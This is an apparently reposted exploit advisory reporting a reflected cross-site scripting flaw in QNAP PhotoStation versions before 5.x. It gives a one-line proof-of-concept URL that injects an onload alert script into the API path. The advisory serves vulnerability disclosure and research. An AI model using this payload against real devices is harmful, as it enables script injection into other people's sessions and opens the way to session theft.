QNAP PhotoStation versions prior to 5.x suffer from a cross site scripting vulnerability.
52812aac543d17d1afa1a4789a77b9d3c4cef54c6a2c6e28c3dcb857dce53824# Exploit QNAP PhotoStation < 5.x Cross-Site Scripting
# Date: 5/22/2018
# Exploit Author: SaeedReza Zamanian
# Software Link: https://www.qnap.com/en/app_center/con_show.php?op=showone&internalName=PhotoStation&version=5.7.0&down_1_name=TS-251&jump_win=1&qts=4.3.4&seq=120
# Vendor Home Page: https://www.qnap.com
# Tested On: Unix
# Contact: https://www.linkedin.com/in/penetrationtest/
1. Description
Parameter Validation is not implemented correctly in this applicaton, so attackers can implement XSS attack on this webapp.
2. Proof of Concept
https://[Site]:4443/photo/api/inde%3Cbody%20onload=alert('XSSED');%3E.php
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed